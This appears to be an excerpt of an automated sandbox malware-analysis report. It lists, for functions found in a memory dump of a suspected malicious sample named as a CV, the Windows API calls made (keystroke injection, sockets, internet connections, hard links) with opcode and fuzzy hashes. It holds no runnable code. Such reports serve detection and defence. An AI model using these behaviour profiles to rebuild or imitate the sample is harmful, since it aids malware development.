                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        • Opcode ID: 8cf85d09afc459fa10224ff00d92a31cca2b1a90490fb80efe665dce5748fb54
                                                                                        • Instruction ID: 8c82a4871698cdde9df9434b217def03a75158914fb1cad25a04f71334c03bf5
                                                                                        • Opcode Fuzzy Hash: 8cf85d09afc459fa10224ff00d92a31cca2b1a90490fb80efe665dce5748fb54
                                                                                        • Instruction Fuzzy Hash: 53A16D76204B019FCB12EF14C991B2AB7E5BF48710F15445AF9969B3A1CB70FD05CB86
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        • Opcode ID: 52e89315829127d559649124c155bb289f8bb4a00b7355ad64dcd730d3930cff
                                                                                        • Instruction ID: fb02d70e8c95efc17b40a6cb4b64de21b4cae68ae5ff518774aa802716a4c810
                                                                                        • Opcode Fuzzy Hash: 52e89315829127d559649124c155bb289f8bb4a00b7355ad64dcd730d3930cff
                                                                                        • Instruction Fuzzy Hash: F051EC346047069BDB269F65D4917AEB3E9EF45318F24881FE74ACFAD1DB309880C705
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 3877424927-0
                                                                                        • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                        • Instruction ID: 1b7cab39aa90ac3855eb697009a454f0a46f5246817f48395a282111d5182da8
                                                                                        • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                        • Instruction Fuzzy Hash: B751B5B0A00305ABDB268FA9C88566EB7A5EF43320F25872DF835966E0D775DF54CB40
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(01866F40,?), ref: 003EC544
                                                                                        • ScreenToClient.USER32(?,00000002), ref: 003EC574
                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 003EC5DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3880355969-0
                                                                                        • Opcode ID: 60f1fb3da6adfa1d9ffa936b505ddee066df9b68f15335595809074d61929803
                                                                                        • Instruction ID: 2bcad936e8692f468a6a119f6cbba040687e3e9e45724d677406ebf3cf0d01aa
                                                                                        • Opcode Fuzzy Hash: 60f1fb3da6adfa1d9ffa936b505ddee066df9b68f15335595809074d61929803
                                                                                        • Instruction Fuzzy Hash: 28518F75910254EFCF11DF6AC880AAE7BB5FB45320F159669F8159B2D0D730ED82CB90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003BC462
                                                                                        • __itow.LIBCMT ref: 003BC49C
                                                                                          • Part of subcall function 003BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003BC753
                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 003BC505
                                                                                        • __itow.LIBCMT ref: 003BC55A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: 99bc5a62d7780f7bd16f6f9e728c0e28622b31fb70e53d1a38611ace93b9d212
                                                                                        • Instruction ID: 49ae1ace37e980139fb43782d7654dca3c6cc728ffd4a1867feadbf85c8f0262
                                                                                        • Opcode Fuzzy Hash: 99bc5a62d7780f7bd16f6f9e728c0e28622b31fb70e53d1a38611ace93b9d212
                                                                                        • Instruction Fuzzy Hash: 15419371A00708ABDF33EF55C856BEE7BB9AF49704F001059FA05AB181DB749A458BA1
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003C3966
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 003C3982
                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003C39EF
                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 003C3A4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 20ff3de5569a6e24a45759233bc81a6cce65c4f8da422c1fc6f06b1bcec1ef82
                                                                                        • Instruction ID: d92d099b8db671901d115a35526d7b83794b745e6429b20161d785909af9ee0c
                                                                                        • Opcode Fuzzy Hash: 20ff3de5569a6e24a45759233bc81a6cce65c4f8da422c1fc6f06b1bcec1ef82
                                                                                        • Instruction Fuzzy Hash: 84410970E04248AEEF328B648809FFDBBB99B59310F04815EE4C2E61D1C7B58E95D765
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003CE742
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 003CE768
                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003CE78D
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003CE7B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 3321077145-0
                                                                                        • Opcode ID: 09faadd2955acca2e4c5cccc91104965a4ebabf0f4991092b5d58321ddec9534
                                                                                        • Instruction ID: 1aae69e09fa499df10784c1cb99004ff13246b38ca7f1155140d7abf8e452dd0
                                                                                        • Opcode Fuzzy Hash: 09faadd2955acca2e4c5cccc91104965a4ebabf0f4991092b5d58321ddec9534
                                                                                        • Instruction Fuzzy Hash: 18413539600610DFCF12EF54C945A5DBBE5BF99720B098499E906AF3A2CB70FD00DB91
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003EB5D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: 770f9342be7fced1ae5f2f03db4dd4f774a1d0c7a9517df6d612fecfc3394a22
                                                                                        • Instruction ID: 4c441f6e7a9397035cc3b73152845f748b1e721d8b50d3583b7d91b06d200a14
                                                                                        • Opcode Fuzzy Hash: 770f9342be7fced1ae5f2f03db4dd4f774a1d0c7a9517df6d612fecfc3394a22
                                                                                        • Instruction Fuzzy Hash: 923100746012A8BFEF239F9ACC85FAAB768EB06350F514712FA51E61E1C730E9408B55
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 003ED807
                                                                                        • GetWindowRect.USER32(?,?), ref: 003ED87D
                                                                                        • PtInRect.USER32(?,?,003EED5A), ref: 003ED88D
                                                                                        • MessageBeep.USER32(00000000), ref: 003ED8FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: 4fba6df3f68ff4780472f6c7a2e69e418adf660e26992eefef8cf8c0701fa700
                                                                                        • Instruction ID: 1c59811ecebfcebb71ffa863df6ca9b3287cb89822f5fc7a33d6956180b8fc7a
                                                                                        • Opcode Fuzzy Hash: 4fba6df3f68ff4780472f6c7a2e69e418adf660e26992eefef8cf8c0701fa700
                                                                                        • Instruction Fuzzy Hash: 3B419E74A002A8DFCB12DF5AD884BA97BF5FF45350F1A82A9E814DF2A1D330E945CB41
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 003C3AB8
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 003C3AD4
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 003C3B34
                                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 003C3B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 4dc29d7d47a313aede3861458fd366ac370a4905f896068f9bab10bc4d0f0c86
                                                                                        • Instruction ID: 1185d53e34fc2bc95a716fd8eaccb9924b196d4b3cc0320d16212f1276cc063e
                                                                                        • Opcode Fuzzy Hash: 4dc29d7d47a313aede3861458fd366ac370a4905f896068f9bab10bc4d0f0c86
                                                                                        • Instruction Fuzzy Hash: 38317530A00258AEEF329BA48C19FFE7BB99B45310F04811EE482E72C1C7759F45C761
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B4038
                                                                                        • __isleadbyte_l.LIBCMT ref: 003B4066
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003B4094
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003B40CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: e0a52b9af1006b54bfc81e418cc31e2a77f0857c8a512dd4796fa553e2e32cac
                                                                                        • Instruction ID: 2b46020f9bc0479df0b199b8c3ec82d96bac775a243638e2c577a2c5611c4c45
                                                                                        • Opcode Fuzzy Hash: e0a52b9af1006b54bfc81e418cc31e2a77f0857c8a512dd4796fa553e2e32cac
                                                                                        • Instruction Fuzzy Hash: 5931D430900215AFDB22AF74C844BFABBB5FF41314F164028EB518B4A2E731D890D794
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 003E7CB9
                                                                                          • Part of subcall function 003C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 003C5F6F
                                                                                          • Part of subcall function 003C5F55: GetCurrentThreadId.KERNEL32 ref: 003C5F76
                                                                                          • Part of subcall function 003C5F55: AttachThreadInput.USER32(00000000,?,003C781F), ref: 003C5F7D
                                                                                        • GetCaretPos.USER32(?), ref: 003E7CCA
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 003E7D03
                                                                                        • GetForegroundWindow.USER32 ref: 003E7D09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: db520d3a02a04c11754e1bdbfe77fc82b1af983abce92e6f43188f7f4379eec9
                                                                                        • Instruction ID: 2338c3348ac9647b8eda59f0b00bfbb4c566d072b97f5699099a91b1aa59f050
                                                                                        • Opcode Fuzzy Hash: db520d3a02a04c11754e1bdbfe77fc82b1af983abce92e6f43188f7f4379eec9
                                                                                        • Instruction Fuzzy Hash: B531FE72D00108AFDB11EFA9D9459EFBBFDEF58314B10846AE815E7211DA319E45CFA0
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • GetCursorPos.USER32(?), ref: 003EF211
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003FE4C0,?,?,?,?,?), ref: 003EF226
                                                                                        • GetCursorPos.USER32(?), ref: 003EF270
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003FE4C0,?,?,?), ref: 003EF2A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: 8bda5db44df9b04b5c91b7ca1ef249ad277e4d1e59b745f7ff3246b9557500fe
                                                                                        • Instruction ID: 45a191da76ef47f999e0c32ea33747e26e6207b6bc05b5b0de899aef94c65a2e
                                                                                        • Opcode Fuzzy Hash: 8bda5db44df9b04b5c91b7ca1ef249ad277e4d1e59b745f7ff3246b9557500fe
                                                                                        • Instruction Fuzzy Hash: 1A21D03D600028AFCB168F95CC48EEA7BB9EF0A310F058569FA055B2E1D3749950DB50
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D4358
                                                                                          • Part of subcall function 003D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D4401
                                                                                          • Part of subcall function 003D43E2: InternetCloseHandle.WININET(00000000), ref: 003D449E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        • Opcode ID: 86a3dbdfab9dae05693f5e7d22a5c92818e570cda4a7c5834eb6f53dce026f22
                                                                                        • Instruction ID: d816f418c867df3b343c14acbc83201cfa1e0043525fe99b9645f91236678112
                                                                                        • Opcode Fuzzy Hash: 86a3dbdfab9dae05693f5e7d22a5c92818e570cda4a7c5834eb6f53dce026f22
                                                                                        • Instruction Fuzzy Hash: D8219F7A600605BBEB139FA4AC00FBBB7A9FF44710F14402BBA5597750DB7198359BA0
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 003E8AA6
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003E8AC0
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003E8ACE
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003E8ADC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 52a7e073a3e0dc8f02fb8eb179f718988abefd044bb9f56a16fb9ca208392b17
                                                                                        • Instruction ID: d1e50475ae310bd0dcace2a1b0abc37d6bc0caccc1b65dfa8748d95dab62aa71
                                                                                        • Opcode Fuzzy Hash: 52a7e073a3e0dc8f02fb8eb179f718988abefd044bb9f56a16fb9ca208392b17
                                                                                        • Instruction Fuzzy Hash: 5111D331A05520AFD706AB58CC05FBA7799BF85320F144629F81ADB2E2CF70BC008794
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 003D8AE0
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 003D8AF2
                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 003D8AFF
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8B16
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastacceptselect
                                                                                        • String ID:
                                                                                        • API String ID: 385091864-0
                                                                                        • Opcode ID: 60677ced74c98c69953955511bc352cc85a7b0f376d77759fabe1e673d2b46ad
                                                                                        • Instruction ID: 4e034573ccfb85511f0d399e21189bd9388706b2ced6b359601510000131fc55
                                                                                        • Opcode Fuzzy Hash: 60677ced74c98c69953955511bc352cc85a7b0f376d77759fabe1e673d2b46ad
                                                                                        • Instruction Fuzzy Hash: B5219372A00124AFC7119F68D985A9EBBFCEF49310F00416AF84AEB290DB74DA458F90
                                                                                        APIs
                                                                                          • Part of subcall function 003C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003C0ABB,?,?,?,003C187A,00000000,000000EF,00000119,?,?), ref: 003C1E77
                                                                                          • Part of subcall function 003C1E68: lstrcpyW.KERNEL32(00000000,?,?,003C0ABB,?,?,?,003C187A,00000000,000000EF,00000119,?,?,00000000), ref: 003C1E9D
                                                                                          • Part of subcall function 003C1E68: lstrcmpiW.KERNEL32(00000000,?,003C0ABB,?,?,?,003C187A,00000000,000000EF,00000119,?,?), ref: 003C1ECE
                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003C187A,00000000,000000EF,00000119,?,?,00000000), ref: 003C0AD4
                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,003C187A,00000000,000000EF,00000119,?,?,00000000), ref: 003C0AFA
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,003C187A,00000000,000000EF,00000119,?,?,00000000), ref: 003C0B2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
